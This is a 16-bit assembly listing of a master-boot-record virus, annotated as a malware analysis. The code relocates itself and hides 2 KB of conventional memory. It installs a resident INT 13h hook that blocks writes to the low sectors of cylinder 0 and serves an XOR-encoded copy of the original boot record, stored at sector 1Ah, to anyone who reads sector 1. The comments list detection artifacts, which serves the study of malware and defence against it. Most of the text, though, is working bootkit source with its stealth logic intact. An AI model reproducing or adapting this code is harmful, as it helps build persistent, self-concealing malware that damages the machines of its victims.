Main PROC FAR
;-----------------------------------------------------------------------
; Boot-sector entry, 16-bit real mode (MASM syntax).
; Analysis note: this listing is a master-boot-record infector with a
; resident INT 13h hook. The comments describe what the visible code does
; so that the artifacts it leaves on a machine can be recognised.
; Assumes the BIOS transferred control with CS = 0000h (0000:7C00h);
; every "jmp bx" in this listing is a near jump within CS.
;-----------------------------------------------------------------------
start:
jmp BeginWrite                  ; installer path; BeginWrite is outside this listing
begin:                          ; presumably the first byte of the 512-byte image written to disk
push es                         ; BIOS-entry ES/DS; one is popped at NewInt13hCodeEnd, the other stays on the stack
push ds
mov cx,0100h                    ; 0100h words = 512 bytes = one sector
mov di,0600h                    ; destination 0000:0600h, below the 0000:7C00h load address
mov ax,0000h
mov ds,ax
mov es,ax
mov si,7c00h                    ; source 0000:7C00h, where the BIOS loaded the sector
REPNZ MOVSW                     ; F2 prefix on MOVS acts as a plain REP: copies the sector to 0000:0600h
mov bx,offset rrr444rr - offset begin + 0600h   ; rrr444rr inside the relocated copy; correct only if 'begin' is byte 0 of the image at 7C00h
jmp bx                          ; continue from the copy at 0600h so 7C00h can be reused for the real boot record
;-----------------------------------------------------------------------
; Running from the relocated copy at 0000:0600h. Reserves 2 KB at the top
; of conventional memory, saves the original INT 13h vector there, points
; INT 13h at the resident handler and copies the handler into that region.
; In:  DS = ES = 0000h (set by the copy loop above).
; Out: ES = new high segment; DS = 0000h; INT 13h vector = ES:0010h.
; Detection artifacts: the BIOS memory-size word at 0040:0013h is 2 less
; than the installed conventional memory, and the INT 13h vector points
; to the segment (0040:0013h value) * 64, i.e. into the hidden 2 KB.
;-----------------------------------------------------------------------
rrr444rr:
xor ax,ax
mov ds,ax
push ds                         ; keep a 0000h for DS; popped after the vector-table edits
;;;;;;;;;;;;;
mov ax,word ptr ds:[413h] ; BIOS data area 0040:0013h (= 0000:0413h): conventional memory size in KB
dec ax
dec ax ; subtract 2 KB so later BIOS/OS code never allocates the hidden region
mov ds:[413h],ax
MOV CL,06h ; shift count in CL: 8086 has no shl ax,imm8 form
SHL AX,CL ; KB * 64 = segment of the hidden region (638 KB -> 9F80h on a 640 KB machine)
MOV ES,AX ; ES = hidden segment that will hold the saved vector and the new INT 13h handler
;;;;;;;;;;;;;;;
MOV AX,ds:[004Ch] ; offset half of the INT 13h vector (13h * 4 = 4Ch)
mov di,0000h
mov word ptr es:[di],ax ; saved at ES:0000h ...
MOV AX,ds:[004Eh] ; segment half of the INT 13h vector
add di,02h
mov word ptr es:[di],ax ; ... and ES:0002h; the handler chains through cs:[0000h]
;;;;;;;;;;;;;
cli ; interrupts off while the two-word vector is half-written
MOV AX,010h ; new INT 13h offset 0010h: immediately after the saved vector
MOV word ptr ds:[004Ch],ax
MOV AX,ES
MOV word ptr ds:[004Eh],ax ; new INT 13h segment = hidden region
sti
;;;;;;;;;;;;;;
mov cx,offset NewInt13hCodeEnd - offset NewInt13hCodeBegin ; handler length in bytes
pop ds ; DS = 0000h again
mov si,offset NewInt13hCodeBegin - offset begin + 0600h ; handler as it sits in the 0600h copy
mov di,0010h ; destination ES:0010h
repnz movsb ; copy the handler into the hidden segment (F2 prefix acts as REP on MOVS)
mov bx,offset NewInt13hCodeEnd - offset begin + 0600h ; skip over the handler bytes in the 0600h copy
jmp bx
;-----------------------------------------------------------------------
; Resident INT 13h handler; runs at <hidden segment>:0010h, with the
; original vector stored at CS:0000h. Two special cases, both keyed on
; head 0 only and never on the drive number in DL:
;   AH=03h write, DH=0, CX<=0040h -> not performed (low sectors of
;                                    cylinder 0, where the code lives)
;   AH=02h read,  DH=0, CX=0001h  -> redirected to sector 1Ah and the
;                                    first 200h bytes XOR'd with 2Eh, so
;                                    a reader of sector 1 gets the
;                                    original record stored there
; Everything else is chained to the original handler.
; Because DL is not checked, a read of head 0 sector 1 on a floppy is
; redirected as well.
; All six saved registers are restored on every path, so values the BIOS
; returns in AX/CX/DX (the status in AH, AH=08h parameters, ...) are not
; passed back to the caller; only BX, ES and flags survive.
; retf 2 discards the flags the INT pushed, so the caller receives this
; handler's flags at the time of the return.
; Detection: head 0 sector 1Ah holds the real MBR XOR 2Eh, and a read
; of sector 1 through the hooked vector differs from a raw read through
; the saved vector at CS:0000h.
;-----------------------------------------------------------------------
NewInt13hCodeBegin:
push ds
push si
push di
push ax
push cx
push dx
cmp ah,03h                      ; AH=03h: write sectors
jne NotWriteHarddsik
cmp dh,00h                      ; head 0 only
jne NotWriteHarddsik
cmp cx,40h                      ; CH=0 (cylinder 0) and CL<=40h (sector; cylinder bits 8-9 clear)
jbe NewInt13Exit ; write to the first 64 sectors of head 0: return without doing it (CF from this cmp reaches the caller: set unless CX==40h)
NotWriteHarddsik:
cmp ah,02h                      ; AH=02h: read sectors
jne ReadHarddiskNatural
cmp dh,00h
jne ReadHarddiskNatural
cmp cx,001h ; cylinder 0, head 0, sector 1: the boot sector of whatever drive DL names
jne ReadHarddiskNatural
;;;;;;;;;;;;;;;
; read the original boot record
mov cx,01ah ; sector 1Ah holds the encoded copy; AL (sector count) is passed through as the caller set it
pushf
call dword ptr cs:[0000h] ; emulate INT: push flags, far-call the saved original vector
;;;;;;;;;;;;; ; decode the buffer in place
push di
push cx
push ax
mov di,bx
mov cx,200h ; exactly one sector (512 bytes), whatever AL requested
cld
GetRightMBRInfo:
mov al,[di] ; NOTE(review): addresses DS:DI, while INT 13h filled ES:BX; these coincide only when the caller's DS == ES
xor al,2eh ; single-byte XOR key 2Eh
mov byte ptr [di],al
inc di
loop GetRightMBRInfo
pop ax ; restore the AX/CX/DI the BIOS call returned
pop cx
pop di
;;;;;;;;;;;;;;;;;;;
pop dx
pop cx ; caller's registers restored (CX back to 0001h, AX back to the request)
pop ax
pop di
pop si
pop ds
retf 0002 ; return to the INT caller, dropping its pushed flags
ReadHarddiskNatural:
pushf
call dword ptr cs:[0000h] ; chain to the original INT 13h
NewInt13Exit:
pop dx
pop cx
pop ax
pop di
pop si
pop ds
retf 0002
;-----------------------------------------------------------------------
; Continuation after the handler has been copied to high memory (still
; executing from the 0000:0600h copy, DS = 0000h). Loads the real boot
; record through the freshly hooked INT 13h and jumps to it.
; Stack: the 'push ds' from 'begin' is popped into ES; the 'push es'
; from 'begin' is left on the stack.
;-----------------------------------------------------------------------
NewInt13hCodeEnd:
pop es ; ES = BIOS-entry DS value; the read below lands at 0000:7C00h only if that value was 0000h
mov ax,201h ; AH=02h read, AL=1 sector
mov bx,7c00h ; buffer ES:7C00h; the hook decodes at DS:BX, so decode and buffer coincide only when DS == ES
mov cx,001h ; cylinder 0, sector 1: intercepted by the hook, which fetches sector 1Ah and decodes it
mov dx,080h ; head 0, drive 80h (first hard disk)
int 13h
jmp bx ; near jump to CS:7C00h (CS = 0000h): hands control to the decoded original boot record